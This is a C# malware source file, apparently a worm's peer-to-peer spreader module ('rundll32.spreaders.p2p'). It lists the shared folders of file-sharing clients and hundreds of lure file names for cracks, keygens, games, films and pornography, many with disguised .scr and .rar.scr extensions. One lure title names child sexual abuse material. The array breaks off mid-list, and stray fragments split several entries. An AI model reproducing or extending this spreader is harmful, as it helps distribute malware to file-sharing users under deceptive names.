using System;
using System.IO;
using System.Windows.Forms;

namespace rundll32.spreaders;

internal class p2p
{
	private static string[] PeerToPeerClientList = new string[10] { "\\LimeWire\\Shared\\", "\\morpheus\\my shared folder\\", "\\edonkey2000\\incoming\\", "\\bearshare\\shared\\", "\\winmx\\shared\\", "\\tesla\\files\\", "\\limewire\\shared\\", "\\grokster\\my grokster\\", "\\icq\\shared folder\\", "\\emule\\incoming\\" };

	private static string[] PeerToPeerNameToShareList = new string[668]
	{
		"ADOBE PHOTOSHOP CS5 EXTENDED EDITION.exe", "Adobe CS5 Crack.exe", "Adobe cs5 extended edition crack.exe", "Microsoft Windows 7 loader.exe", "Microsoft Office 2010 Pro Plus x64 & x86 14.0.4743.1000 Full.exe", "Windows 7 Ultimate AIO Activated.exe", "Nero 9 Reloaded 9.4.26.0 + keygen.exe", "New Windows 7 Activator.exe", "Nero Multimedia Suite 10.0.13100 + key crack.exe", "Microsoft Office Enterprise 2007.exe",
		"WinRAR v3.90 Final + KeyReg.exe", "Sandboxie 3.44-serial incl(32-bit & 64-bit).exe", "MemoriesOnTV 4.1.2-serial.exe", "Ashampoo Photo Commander 6.60-serial.exe", "Malwarebytes Anti-Malware 1.44-serials.exe", "Display Fusion 3.1.6-serial.exe", "Audio Editor Gold 8.8.1.1368-serial.exe", "XYplorer 8.80.0000-serial.exe", "ESET Smart Security 4.0.467-For Life.exe", "Snagit 9.1.3-serial.exe",
		"DownloadStudio 5.2.0.0-crack and serial.exe", "Sandboxie 3.42-serial.exe", "TuneUp Utilities 2010 9.0.2020-serial.exe", "MediaMonkey Gold 3.2.0.1294-serial.exe", "RegCure 2.0.0.0-crack.exe", "Cheetah DVD Burner 2.45-serial.exe", "OJOsoft Total Video Converter 2.7.2.1017-serial.exe", "PowerISO 4.6-serial.exe", "Nitro PDF Pro 6.0.1.8-keygen.exe", "Modern Warfare 2 Catalyst-hax.exe",
		"Mw2 Aimbot Pro Mod.exe", "Red Dead Redemption modder.exe", "GTA IV bus mod.exe", "Modern warfare 2 Prestige Mod.exe", "Modern Warfare 2 Embles Mod.exe", "Modern Warfare 2 explorer mod.exe", "Modern Warfare Exploit Pack.exe", "ADOBE PHOTOSHOP CS5 EXTENDED EDITION.scr", "Adobe CS5 Crack.scr", "Adobe cs5 extended edition crack.scr",
		"Microsoft Windows 7 loader.scr", "Microsoft Office 2010 Pro Plus x64 & x86 14.0.4743.1000 Full.scr", "Windows 7 Ultimate AIO Activated.scr", "Nero 9 Reloaded 9.4.26.0 + keygen.scr", "New Windows 7 Activator.scr", "Nero Multimedia Suite 10.0.13100 + key crack.scr", "Microsoft Office Enterprise 2007.scr", "WinRAR v3.90 Final + KeyReg.scr", "Sandboxie 3.44-serial incl(32-bit & 64-bit).scr", "MemoriesOnTV 4.1.2-serial.scr",
		"Ashampoo Photo Commander 6.60-serial.scr", "Malwarebytes Anti-Malware 1.44-serials.scr", "Display Fusion 3.1.6-serial.scr", "Audio Editor Gold 8.8.1.1368-serial.scr", "XYplorer 8.80.0000-serial.scr", "ESET Smart Security 4.0.467-For Life.scr", "Snagit 9.1.3-serial.scr", "DownloadStudio 5.2.0.0-crack and serial.scr", "Sandboxie 3.42-serial.scr", "TuneUp Utilities 2010 9.0.2020-serial.scr",
		"MediaMonkey Gold 3.2.0.1294-serial.scr", "RegCure 2.0.0.0-crack.scr", "Cheetah DVD Burner 2.45-serial.scr", "OJOsoft Total Video Converter 2.7.2.1017-serial.scr", "PowerISO 4.6-serial.scr", "Nitro PDF Pro 6.0.1.8-keygen.scr", "Modern Warfare 2 Catalyst-hax.scr", "Mw2 Aimbot Pro Mod.scr", "Red Dead Redemption modder.scr", "GTA IV bus mod.scr",
		"Modern warfare 2 Prestige Mod.scr", "Modern Warfare 2 Embles Mod.scr", "Modern Warfare 2 explorer mod.scr", "Modern Warfare Exploit Pack.scr", "ADOBE PHOTOSHOP CS5 EXTENDED EDITIONzip.scr", "Adobe CS5 Crackzip.scr", "Adobe cs5 extended edition crackzip.scr", "Microsoft Windows 7 loaderzip.scr", "Microsoft Office 2010 Pro Plus x64 & x86 14.0.4743.1000 Fullzip.scr", "Windows 7 Ultimate AIO Activatedzip.scr",
		"Nero 9 Reloaded 9.4.26.0 + keygenzip.scr", "New Windows 7 Activatorzip.scr", "Nero Multimedia Suite 10.0.13100 + key crackzip.scr", "Microsoft Office Enterprise 2007zip.scr", "WinRAR v3.90 Final + KeyRegzip.scr", "Sandboxie 3.44-serial incl(32-bit & 64-bit)zip.scr", "MemoriesOnTV 4.1.2-serialzip.scr", "Ashampoo Photo Commander 6.60-serialzip.scr", "Malwarebytes Anti-Malware 1.44-serialszip.scr", "Display Fusion 3.1.6-serialzip.scr",
		"Audio Editor Gold 8.8.1.1368-serialzip.scr", "XYplorer 8.80.0000-serialzip.scr", "ESET Smart Security 4.0.467-For Lifezip.scr", "Snagit 9.1.3-serialzip.scr", "DownloadStudio 5.2.0.0-crack and serialzip.scr", "Sandboxie 3.42-serialzip.scr", "TuneUp Utilities 2010 9.0.2020-serialzip.scr", "MediaMonkey Gold 3.2.0.1294-serialzip.scr", "RegCure 2.0.0.0-crackzip.scr", "Cheetah DVD Burner 2.45-serialzip.scr",
		"OJOsoft Total Video Converter 2.7.2.1017-serialzip.scr", "PowerISO 4.6-serialzip.scr", "Nitro PDF Pro 6.0.1.8-keygenzip.scr", "Modern Warfare 2 Catalyst-haxzip.scr", "Mw2 Aimbot Pro Modzip.scr", "Red Dead Redemption modderzip.scr", "GTA IV bus modzip.scr", "Modern warfare 2 Prestige Modzip.scr", "Modern Warfare 2 Embles Modzip.scr", "Modern Warfare 2 explorer modzip.scr",
		"Modern Warfare Exploit Packzip.scr", "ADOBE PHOTOSHOP CS5 EXTENDED EDITION.rar.scr", "Adobe CS5 Crack.rar.scr", "Adobe cs5 extended edition crack.rar.scr", "Microsoft Windows 7 loader.rar.scr", "Microsoft Office 2010 Pro Plus x64 & x86 14.0.4743.1000 Full.rar.scr", "Windows 7 Ultimate AIO Activated.rar.scr", "Nero 9 Reloaded 9.4.26.0 + keygen.rar.scr", "New Windows 7 Activator.rar.scr", "Nero Multimedia Suite 10.0.13100 + key crack.rar.scr",
		"Microsoft Office Enterprise 2007.rar.scr", "WinRAR v3.90 Final + KeyReg.rar.scr", "Sandboxie 3.44-serial incl(32-bit & 64-bit).rar.scr", "MemoriesOnTV 4.1.2-serial.rar.scr", "Ashampoo Photo Commander 6.60-serial.rar.scr", "Malwarebytes Anti-Malware 1.44-serials.rar.scr", "Display Fusion 3.1.6-serial.rar.scr", "Audio Editor Gold 8.8.1.1368-serial.rar.scr", "XYplorer 8.80.0000-serial.rar.scr", "ESET Smart Security 4.0.467-For Life.rar.scr",
		"Snagit 9.1.3-serial.rar.scr", "DownloadStudio 5.2.0.0-crack and serial.rar.scr", "Sandboxie 3.42-serial.rar.scr", "TuneUp Utilities 2010 9.0.2020-serial.rar.scr", "MediaMonkey Gold 3.2.0.1294-serial.rar.scr", "RegCure 2.0.0.0-crack.rar.scr", "Cheetah DVD Burner 2.45-serial.rar.scr", "OJOsoft Total Video Converter 2.7.2.1017-serial.rar.scr", "PowerISO 4.6-serial.rar.scr", "Nitro PDF Pro 6.0.1.8-keygen.rar.scr",
		"Modern Warfare 2 Catalyst-hax.rar.scr", "Mw2 Aimbot Pro Mod.rar.scr", "Red Dead Redemption modder.rar.scr", "GTA IV bus mod.rar.scr", "Modern warfare 2 Prestige Mod.rar.scr", "Modern Warfare 2 Embles Mod.rar.scr", "Modern Warfare 2 explorer mod.rar.scr", "Modern Warfare Exploit Pack.rar.scr", "myhotpics.rar.scr", "myexgirlnakedpics.rar.scr",
		"[AVI/1.37G] Curvaceous 2, Vivid", "[AVI/1.4G] Dorcel Airlines", "[AVI/10.22GB] Eight Newest's Movies (June 13)", "[AVI/10.23GB] Seven Newest's Movies  11 June", "[AVI/10.25GB] Eight Newest's Movies June 12", "[AVI/11.06GB] Six newest movies 06 05", "[AVI/700M]Sexy.Seductive.Housewives", "[AVI/793MB]ATV Entertainment ~ Funny Sex Games", "[AVI/8.87GB] Seven Newest Movies 06 10", "[AVI/9.56GB] 2010 AVN AWARD NOMINEES MOVIES",
		"[DVD/61.6GB] DVDs 12 NEWEST MOVIES", "[PC ~ MULTI5] FIFA 2010", "[PSP]2010_FIFA_World_Cup_South_Africa[USA][FIX].rar", "[PSP]Prince.of.Persia.The.Forgotten.Sands.[USA-RIP][FIX].-..rar", "[WII", "1037", "]Red_Steel_2[PAL].rar", "[WII]2010 Fifa World Cup South Africa[PAL].rar", "[Wii]Call_Of_Duty_Modern_Warfare_Reflex[NTSC][WiiSOS.com]", "[WII]Iron_Man_2_The_Videogame[PAL].rar",
		"[WII]Monster.Hunter.Tri[PAL].rar", "[Wii]New_Super_Mario_Bros_Wii[PAL][FullISO][WiiSOS.com]", "[WII]No More Heroes 2 Desperate Struggle [PAL].rar", "[WII]Prince of Persia The Forgotten Sands [NTSC].rar", "[WII]Super Mario Galaxy 2 [NTSC].rar", "[Wii]Super_Mario_Galaxy[PAL][MULTI5][ESPALWii.com].rar", "[WMV/1.69GB] WoodmanCastingX - Eve Angel", "100% Real Homemade Porn (DVD) - anal, more than 210 mins!", "2012 (2009) R5 DVDRip XviD-MAX", "236 Newer (2010) iPhone/iPod Touch Apps [.ipa][Cracked]",
		"50 Cent - Before I Self Destruct CDRip 2009 [Cov+CD][Bubanee]", "ACDC - Discography - 1975-2008 (31 CD's plus many extras &amp; co", "ADOBE ACROBAT 9.3.2 PRO EXTENDED EDITION", "Adobe After Effects CS4 (Final) + Crack [", "1037", "RH]", "Adobe CS3 Photoshop Extended and Illustrator - All Cracked", "Adobe CS5 Master Collection [CRACK]", "Adobe CS5 Master Collection [MAC]", "Adobe Dreamweaver CS4 + Keygen &amp; Activation Patch",
		"Adobe Flash CS4 Professional + Keygen", "Adobe Photoshop CS3 Extended Version Full + Crack", "Adobe Photoshop CS4 Extended", "ADOBE PHOTOSHOP CS4 EXTENDED EDITION v11.0.1", "Adobe Photoshop CS4 With Keygen, Crack, Mac Version", "Adobe Photoshop CS5 Extended - Mac OSX    + Serial and Hack", "Adobe Photoshop CS5 Extended (Crack + Instructions)", "ADOBE PHOTOSHOP CS5 EXTENDED EDITION", "ADOBE PREMIERE PRO CS4", "ADOBE PREMIERE PRO CS5",
		"Adobe.Creative.Suite.5.Master.Collection -PRELRELEASE", "Adobe.Photoshop.CS5.Extended.v12.Keygen.Only.EMBRACE-Deantjah", "Age of Empires 3", "Alan Wake [XBOX360] [MULTI9] [REGION FREE]", "Alcohol 120 v2.0.0.1331+Patch(Works with w7) [ kk ]", "Alice in Wonderland (2010) DVDRip XviD-DiAMOND", "Alice In Wonderland 2010 TS XViD - IMAGiNE[ExtraTorrent]", "Alice in Wonderland[2010]DvDrip[Eng]-FXG", "Alicia Keys - The Element Of Freedom CDRip 2009 [Cov+CD][Bubanee", "Aliens Vs Predator Proper-Razor1911-[tracker.BTARENA.org].iso",
		"Alpha Protocol-SKIDROW-[tracker.BTARENA.org].iso", "Anal.Buffet.4.DISC1.XXX.DVDRip.XviD-NYMPHO", "Anal.Overdose.DISC1.XXX.DVDRip.XviD-NYMPHO", "Anal.Overdose.DISC2.XXX.DVDRip.XviD-NYMPHO", "Anal.Overdose.XXX.DVDRip.XviD-NYMPHO", "Assassins Creed 2 [Multi9] [PCDVD9][WITH CRACK]", "Assassins Creed II (2) [PC] [RUSSIAN] [CLONEDVD]", "Assassins Creed II-SKIDROW", "Asslicious.2.XXX.BDRip.XviD-Jiggly", "Atomix Virtual DJ Pro V6.0.2 + Crack + Add Ons   [blaze69]",
		"Atomix Virtual DJ v6.0.2 Professional + Key [RH]", "Autodesk AutoCaD 2011 / 32Bit / Multilangual + Keygen [WL]", "Autodesk AutoCAD Suite 2010 FULL Win32", "Autodesk.3ds.Max.2010.(32/64 bit).Full.DVD-XFORCE", "Avast! Anti Virus Professional 4.8.1356 Incl. Serial + Skins [13", "Avatar (2009) PROPER TS XviD-MAX", "Avatar 2009 1080p BluRay X264-AMIABLE", "AVG Anti-Virus Professional 9.0 Build 663a1706 + Keygen [RH]", "AVG_Anti-Virus Professional 9.0.814 + Serial -TrT", "AVS Video Converter v6.3.1.367 + Crack [RH]",
		"B.o.B. - Nothin On You Feat Bruno Mars [.mp3]", "B.o.B. Feat Hayley Williams &amp; Eminem - Airplanes Pt. 2 [.mp3]", "B.o.B. Feat. Bruno Mars - Nothing On You (2010) (mrsjs)", "Backroom.xXx Casting.Couch.SITERIP@Mastitorrents", "Barely Legal 100 - Hustler - RHD", "Barely.Legal.Fresh.Faces.XXX.DVDRiP.XviD-DivXfacTory", "Batman XXX A Porn Parody XviD.avi", "Batman.Arkham.Asylum-RELOADED", "Battlefield Bad Company 2-RELOADED", "Battlefield.Bad.Company.2-RELOADED.iso",
		"Before.They.Were.Famous.2.XXX.DVDRiP.XviD-DivXfacTory", "Big Butt Beauties 2010 DvDRip [Digital Sin]", "Big Butts Like It Big - LISA ANN New June 14@Mastitorrents", "Big.Rack.Attack.2010.XXX.DVDRiP.XviD-DivXfacTory", "Big.Tits.At.Work.10.XXX.DVDRiP.XviD-DivXfacTory", "BigTitsAtSchool.-.Brooke.Banner.Kortney.Kane.Daisy.Cruz", "BioShock_2-Razor1911", "Black Eyed Peas - END Deluxe 2CDRip 2009 [Cov+2CD][Bubanee]", "Black.Azz.Orgy.7.XXX.DVDRip.XviD-NYMPHO", "Blur.XBOX360-MARVEL-[tracker.BTARENA.org]",
		"Blur-ViTALiTY-[tracker.BTARENA.org].iso", "Bob Marley - Complete Discography [Mp3 - 256Kbps]", "Bomb.Ass.White.Booty.14.XXX.DVDRip.XviD-NYMPHO", "Borderlands Proper-Razor1911(No Rars)", "Breaking Bad S03E12 Half Measures HDTV XviD-FQM [eztv]", "Breaking Bad S03E13 Full Measure HDTV XviD-FQM [eztv]", "Buttwoman.Vs.Slutwoman.XXX.DVDRip.XviD-Jiggly", "Call of Duty 2", "Call of Duty 4 Modern Warfare + Patch 1.7 (RUS) [2XDVD5]", "Call of Duty 4 Modern Warfare Full-Rip Skullpt",
		"1037", "ura", "Call of duty 5 World at war [PC-DVD] [English] ", "Call of Duty Modern Warfare 2 PROPER-SKIDROW", "Celebrity.Sextape.Collection", "Christina Aguilera - Bionic (2010)", "Civilization 4 + expansions", "Clash Of The Titans 2010 TS XViD - IMAGiNE", "Clash Of The Titans XVID-PrisM 2010 s.avi", "Club Music 2010 [320kbps] [Electro-House]",
		"Coleccion.Porno.Mania.Vol.10.2010.SPANISH.XXX.DVDRip.XviD ", "Command.And.Conquer.4.Tiberian.Twilight-RELOADED-[tracker.BTAREN", "Complete BangBus Rip - Episode 1 to 166 - PORNFINDER -", "ConvertXtoDVD v4.0.9.322 + Serials By ChattChitto", "Corel Draw X5 with keygen", "Counter Strike 1.6 Full (With Bots) + Maps (By IRAN Torrents)", "Dancing.Bear.-.Around.The.World.In.100.Mouths.6-2-2010", "Date Night (2010) Spanish DVDSCR", "Date Night.2010.R5.Line.Xvid {1337x}-Noir[ExtraTorrent]", "David Guetta - One Love (Special Edition) [2009-mp3-320] [SvC]",
		"David Guetta &amp; Akon - Sexy Bitch  [.mp3]", "David Guetta ft. Kid Cudi - Memories [.mp3]", "David Guetta-Gettin' Over You (Feat. Fergie &amp; LMFAO).mp3", "Daybreakers[2009]DvDrip[Eng]-FXG", "Dear John.2010.DVDRip.XviD{1337x}-Noir", "Defloration.com xXx Full Site Rip@Mastitorrents", "Diablo 2 + Diablo 2: Lord Of Destruction", "Dirt.2-RELOADED.iso", "DJ.Khaled-Victory-(Retail)-2010-[NoFS]", "Doctor Who 2005 S05E11 HDTV XviD-BiA [eztv]",
		"Doctor.Adventures.-.Rachel.Starr.Julia.Ann", "Dorian Gray (2009) Spanish BRSCR", "Dragon Age Origins + Awakening + DLC + Guide ALL IN ONE", "Dragon Age Origins-SKIDROW(No Rars)", "Drake - Over [Single-2010-Cov][Bubanee]", "Drake - So Far Gone[2009][Explicit]", "Drake - Thank Me Later [2010-MP3-Cov][Bubanee]", "Drake-Thank.Me.Later-(Retail)-2010-[NoFS]", "DriverPack Solution 10 Professional x32-64   [ Victory]", "? ??? ??????? ??????? (2010) DVDRip",
		"Edge of Darkness[2010]DvDrip[Eng]-FXG", "Edward Maya feat Vika Jigulina - Stereo love (extended version)", "El Hombre Lobo DVDR [Spanish] PAL", "Eminem - Not Afraid - Dirty and Clean [2010-Singles][Bubanee]", "Eminem - Relapse (2009) (320 Kbps)", "Eminem-Recovery 2010 Retail_by_dwerso.All tracks_covers_320kbs", "Eminem-Recovery-(Retail)-2010-[NoFS]", "En toute intimate", "ESET NOD32 Anti-Virus 4.0.468.0-For Life", "Facial.Fest.-.AJ.Estrada",
		"Fallout.3.Game.of.the.Year.Edition-Unleashed-[tracker.BTARENA.or", "Far Cry 2 - Razor1911 iso windows", "Fifa_10-Razor1911-[tracker.BTARENA.org].iso", "Final Cut Studio 3 - Complete Suite", "FL Studio 9 XXL Producer Edition", "FL Studio XXL v9.0.0 +UN-LOCKER +UN-LOCKED VSTi [ P.r.t.CreW!] 1", "Florence And The Machine - Lungs [2009][320kbps]MP3-MT", "Foo Fighters - Greatest Hits CDRip 2009 [Cov+CD][Bubanee]", "Football.Manager.2010-RELOADED.iso", "From Paris with Love (2010) R5 DVDRip XviD-MAX",
		"FRUITY LOOPS Studio Producer Edition 9-cracks incl", "Fuck.My.Big.Ass.XviD-DETOXATiON", "Fuck.Team.Five.-.London.Keyes.Suzanne.Kelly.Miko.Sinz", "Garfields Pet Force (2009) Spanish DVDSCR", "Get Him to the Greek XVID-PrisM 2010.avi", "Girls Gone Wild - Sex Starved College Girls 4 (DVD.xvid) - GGW", "Glee.S01E21.HDTV.XviD-LOL.[VTV].avi", "Glee.S01E22.HDTV.XviD-LOL.[VTV].avi", "Glee: The Music - Vol 3 - Showstoppers [Deluxe Edition]", "Golden.Girls.A.XXX.MILF.Parody.XXX.DVDRip.XviD-NYMPHO",
		"Gorillaz - Plastic Beach [2010-MP3-Cov][Bubanee]", "Grand Theft Auto (GTA): San Andreas - Winter Came [PC]", "Grand Theft Auto Episodes from Liberty City-RELOADED", "Grand Theft Auto IV Episodes From Liberty City [MULTI5] Repack", "Grand Theft Auto IV PC Version Full Game and Crack", "Grand Theft Auto Vice City - PC", "Green Zone (2010) DVDRip XviD-MAX", "Green Zone (2010) Spanish DVDSCR", "Green Zone 2010 1080p BluRay x264-MACHD", "Green Zone 720p Bluray x264-CBGB",
		"Green Zone[2010]DvDrip[Eng]-FXG", "Group.Sluts.XXX.DVDRiP.XviD-DivXfacTory", "GTA San Andreas full game pc &lt;&lt;with crack&gt;&gt;", "GTA.IV-ArenaBG", "Guitar Pro 5", "Guitar Pro 6.0.1 r7840 (no MAC change + Fixed Patch)", "1037", "", "Hells.Kitchen.US.S07E03.WS.PDTV.XviD-LOL (XT)", "Hells.Kitchen.US.S07E04.WS.PDTV.XviD-LOL (XT)",
		"Her.First.Anal.Sex.-.Diana.Gold", "Heroes of Might and Magic III Complete", "Homemade &amp; Amateur (130 clips) - anal, POV, teen/MILF", "Hot Schoolgirls - Lexi belle, Jenna Presley.avi", "Hot Tub Time Machine (2010) R5 XviD-MAX", "Hot Tub Time Machine (2010) Spanish DVDSCR", "Hot Tub Time Machine.2010.R5.Line.XviD{1337x}-Noir", "Hot videos from XX Hindi Indian Movies@Mastitorrents", "How.To.Train.Your.Dragon.2010.TS.XviD-PrisM[ExtraTorrent]", "iLife ’09 Install DVD.dmg",
		"Infirmieres.Et.Salopes.XXX.DVDRip.XviD", "Invictus[2009]DvDrip[Eng]-FXG", "Ip Man 2 2010 720p B", "1037", "luRay x264 DTS-WiKi", "Ip Man 2 2010 720p BluRay x264 DTS-WiKi", "Iron Man 2 2010 TS XviD Xclusive LKRG[ExtraTorrent]", "Iron.Man[2008]DvDrip-aXXo", "IYAZ - Replay [.mp3]", "Jack Johnson - To The Sea [mp3-vbr-2010]",
		"James Camerons Avatar The Game-RELOADED", "Jason Derulo - In My Head(2009)(128 Kbps).mp3", "Jason Derulo - Jason Derulo CDRip 2010 [Cov+CD][Bubanee]", "Jason DeRulo - Whatcha Say - Single", "Jay Z    - Discography + Collections  + Mixtapes", "Jay-Z - The Blueprint 3 [2009-mp3-320] [SvC]", "Jay-Z ft. Mr. Hudson - Young Forever [.mp3]", "Jay-Z-The.Blueprint.III-(Retail)-2009-[NoFS]", "John Mayer - Battle Studies [2009-MP3-Cov][Bubanee]", "Just Cause 2-RELOADED",
		"Justin Bieber - My World 2.0 (Full Album) 2010", "Justin_Bieber_feat_Ludacris_-_Baby.mp3", "Karate.Kids.2010.CAM. XVID-WBZ", "Kaspersky Antivirus + Internet Security 2010 + keys", "Katy Perry - California Gurls feat. Snoop Dogg + Cover - 2010", "Ke$ha (Kesha) - Animal Deluxe Edition (2010)'JB59", "Kendra Exposed - The Kendra Wilkinson Sex Tape.flv", "Kendra Wilkinson Exposed Sex Tape [full version].avi", "Kesha-Tik Tok [New Single] marty70.mp3", "Kick-Ass (2010) R5 XViD-MAX",
		"Kid CuDi-Man On The Moon: The End of Day (2009)(320kbps)", "Kim Kardashian Superstar (2007, DVD.xvid) - celebrity sex tape", "Kings Of Leon - Only By The Night[2008][MP3@320kbps]-antecho", "K-Lite Mega Codec Pack 6.0.4 [DXO] updated June 2nd 2010", "K'naan - Wavin' Flag   ( Knaan - Waving Flag )", "Lady Antebellum - Need You Now (Retail.2010)'JB59", "Lady Gaga - Bad Romance [320kbps] New Single/Proper CD-Rip", "Lady GaGa - The Fame Monster 2CDRip 2009 [Cov+2CD][Bubanee]", "Lady Gaga Ft. Beyonce - Telephone (2009)", "Law and Order Criminal Intent S09E12 True Legacy HDTV XviD-FQM [",
		"Led Zeppelin - Discography (MP3@320Kbps)", "Left 4 Dead 2 Full Game directplay by globe@", "Legion  (2010) Spanish BRSCR", "Legion (2010) R5 DVDRip XviD-MAX", "Les sexpervers 2", "Lexi Belle - The Little Spermaid (2010) [HD 1080p]", "Lie.to.Me.S02E12.HDTV.XviD-LOL.[VTV].avi", "Lil Wayne Discography + Mixtape Albums + Mixtapes [RAP]", "Lil.Wayne-Rebirth-Retail.Deluxe.Edition)-2010-[NoFS]", "LimeWire PRO v5.4.6.1 Final [ChattChitto RG]",
		"LimeWire PRO v5.5.8 Final + Crack [ChattChitto RG]", "Linkin Park Discography", "LittleCaprice - Four Chicks, One Lucky Guy.avi", "Logic Studio 9 Install DVD", "lolita, teens, anal, incest, rape, latex, animal, orgy porn pack", "Lost - Season 6 Complete (S06)_S06E01-S06E17+S06E00--ADreaNaL", "Lost S06E17 HDTV XviD-CD2-NoTV [eztv]", "Lost Season 1, 2, 3, 4 and 5", "Lovely.Latinas.XXX.DVDRiP.XviD-DivXfacTory", "Ludacris - Battle Of The Sexes (Full Album) 2010",
		"Ludacris-Battle_Of_The_Sexes-2010-FTD", "Mac OS X 10.6 Snow Leopard (Final Retail)", "Magic ISO Maker 5.4 with serial", "Mass Effect 2 DLC - Overlord Pack [15 June 2010]", "Mass.Effect.PROPER-RELOADED", "Mass_Effect_2-Razor1911", "Mass_Effect_2-Razor1911.iso", "Mathworks.Matlab.R2010a.ISO-TBE", "Meat.Your.Teacher.XXX.DVDRip.XviD-CLiT", "Medieval II Total War + Kingdoms",
		"Metallica - Discography 1983-2008 (19 Albums, 23 CDs)", "Metro 2033 Proper-Razor1911", "MGMT - Congratulations [2010]", "MGMT - Oracular Spectacular [2008]", "Michael Buble - Crazy Love CDRip 2009 [Cov+CD][Bubanee]", "Michael Jackson Greatest Hits [R.I.P.][Bubanee]", "Microsoft Flight Simulator X deluxe", "Microsoft Office 2003 Pro Edition + activated [GR420]", "Microsoft Office 2007 - Full Package - Easy Install [DOLEFISH]", "Microsoft Office 2007 Ultimate+Activated [GR420]",
		"Microsoft Office 2008 for Mac - Standard Edition + 14 serials", "Microsoft OFFICE 2010  Pro Plus PRECRACKED", "Microsoft Office 2010 Final Pro MSDN x32+x64+Activation", "Microsoft Office 2010 Pro Plus (x86/x64 - NL / UK) [NLUPPER]", "Microsoft Office 2010 Pro Plus x64 &amp; x86 14.0.4743.1000 Full", "Microsoft Office 2010 Professional + Key (x86)", "Microsoft Office Enterprise &amp; Professional Plus 2007 with SP2", "Microsoft Office Enterprise 2007", "Microsoft Office Home and Student 2007 Activation Keys", "MICROSOFT OFFICE WORD 2007",
		"Microsoft Office Xp Pro (Word, Excel, Powerpoint, Outlook, Acces", "Microsoft Visual Studio 2010 Ultimate x86-TKiSO", "Microsoft Windows 7 Ultimate Retail(Final) x86 and x64", "Microsoft.Office.2007.Enterprise.Keygen.Only-MiCROSOFT", "Milf.Soup.-.Blake.Rose", "Milf.Strap.Give.Mommy.Your.Ass.XXX.DVDRip.XviD-EINFACHNORMAL", "Mircosoft Office Enterprise 2007 with keys", "Missy - YoungPornHomeVideo.com", "Moms.Black.Cock.Anal.Nightmare.3.XXX.DVDRip.XviD-NYMPHO", "Monster.Dicks.In.Little.White.Chicks.XXX.DVDRiP.XviD-DivXfacTory",
		"Muse - The Resistance [mp3-320-2009]", "My.Dads.Hot.Girlfriend.3.XXX.DVDRip.XviD-Pr0nStarS", "Napoleon Total War-Razor1911", "Nas.And.Damian.Marley-Distant.Relatives-(Retail)-2010-[NoFS]", "NBA.2010.Finals.Game.6.Celtics.vs.Lakers.HDTV.XviD-FQM", "Need For Speed Underground 2", "Need For Speed: Most Wanted Crack-Fully Working!!", "Need.For.Speed.Shift-RELOADED", "Nero 10 Multimedia Suite RETAIL + Keyz", "Nero 8 Ultra Edition 8.3.2.1 [PC] [Multilanguage]",
		"Nero 9 Reloaded 9.4.26.0 + keygen [GR420]", "Nero 9.0.9.4 Ultra Edition + Serials + Patch - Cracked by TAMer", "Nero Multimedia Suite 10.0.13100 + key crack TESTED.rar", "New Windows 7 Activator [2010] [blaze69]", "Ninja Assassin (2009) DVDRip XviD-MAX", "NORTON.ANTIVIRUS.2010.WORKING.FULL+TRIALRESET MAXSPEED [reistad4", "NuruMassage.COMPLETE.SITERIP.XXX.1080p.WMV", "Owl City - Fireflies  [.mp3]", "Owl City Ocean Eyes 2009", "P90X DVD Copy + Extras",
		"Paramore - Brand New Eyes [2009/MP3/320][Bubanee]", "Partition Magic 8 Full", "Pendulum - Immersion [2010-MP3-Cov][Bubanee]", "Persons Unknown S01E02 HDTV XviD-LOL [eztv]", "Phoenix - Wolfgang Amadeus Phoenix [mp3-160-2009]", "Pinnacle Studio 12 Ultimate - by Mick (Full Version)", "Pinnacle Studio 14 HD Ultimate - by Mick (Full Version)", "Pirates I,II - Digital Playground XXX", "Plants vs Zombies [KTB] - v1.0.0.1051", "Plies-Goon.Affiliated-(Retail)-2010-[NoFS]",
		"Porn.Week.Porn.Fan.Fuckfest.Budapest.XXX.DVDRip.XviD-DoggPound", "Porno Private.15.Meine perverse Ex Freundin.German.2010.XXX.DVDR", "Pornstars.Like.It.Big.-.Monique.Alexander", "PowerISO 4.6 and Serial key", "Pretty Little Liars S01E02 The Jenna Thing HDTV XviD-FQM [eztv]", "Prince of Persia The Forgotten Sands CLONEDVD NoGRP", "Prince of Persia The Forgotten Sands-PC- (Multi-Eng-Spain-2010)-", "Prince of Persia The Sands of Time TS XViD - IMAGiNE", "Prince of Persia The Sands of Time TS XViD IMAGiNE", "Prince Of Persia: Sands Of Time for PC",
		"Prince Of Persia: The Forgotten Sands [PC] [CLONEDVD] [Eng]", "Prince Of Persia: The Forgotten Sands [PC] [CLONEDVD] [RUS]", "Private - Orgy At The Villa (2009) - anal, squirting", "Private Gold - Full (all collections 001-100)", "Private.European.Union.of.Milf.Sluts.XXX.DVDRip.XviD-QualitX", "Private.Please.Fuck.Me.Now.XXX.DVDRip.XviD-QualitX", "Private.World.Cup.Footballers.Wives.German.XXX.DVDRip.XviD-PORNO", "Pro.Evolution.Soccer.2010-RELOADED", "Prototype [PC] [MULTI2]", "Prototype-Razor1911 FULL PC ISO MAX",
		"PwnageTool_3.1.5.dmg", "Queen discography (MP3@320Kbps)", "Raajneeti 2010 Hindi Pre-DVDRip x264 M-Sub xRG", "Rack.Jobs.XXX.DVDRip.XviD-NYMPHO", "Radiohead Discography @ 320Kbps", "Rajneeti.2010.Hindi.1CD.Best.PDVD.Rip.Xvid-nEHAL", "Real Warfare 1242-SKIDROW", "Real.Wife.Stories.-.Alexis.Texas.Audrey.Bitoni", "Red Dead Redemption [RF] [X360] ", "Red Hot Chili Peppers - Discography (Fixed)",
		"redsn0w-win_0.8.zip", "Remember Me (2010) DVDRip XviD-MAX", "Rihanna - Rated R CDRip 2009 [Cov+CD][Bubanee]", "Rihanna - Rude Boy [.mp3]", "Robin.Hood.2010.TS.XVID-PrisM", "Rome Total War", "Rosetta Stone 3.4.5 + Crack(VasiaZozulia)", "Rosetta Stone V.3.3.5 app+crack + 11 languages .iso [DEIFIED]", "Rubicon S01E01 Pilot HDTV XviD-FQM [eztv]", "Russian Institute Lesson 6 XXX [DVDRIP][School Girls] by MAZALT.",
		"Sade - Soldier Of Love [2010-MP3-Cov][Bubanee]", "Schoolgirl.POV.8.XXX.DVDRiP.XviD-DivXfacTory", "Sean Kingston Ft. Justin Bieber - Eenie Meenie", "Secret Maryo Chronicles 1.7 [PC] [MULTI2]", "Seventeen - Sweethearts Porn Tour 03", "Sex and the City 2 CAM XViD - IMAGiNE", "Sex Hospital - RHD - ( xxx adult porn ).avi", "Sexy.Seductive.Housewives.XXX.DVDRip.XviD-NYMPHO", "Shakira - She Wolf CDRip 320Kbps [2009][Cov+CD][Bubanee]", "Shakira - Waka Waka - World Cup 2010 Anthem - ",
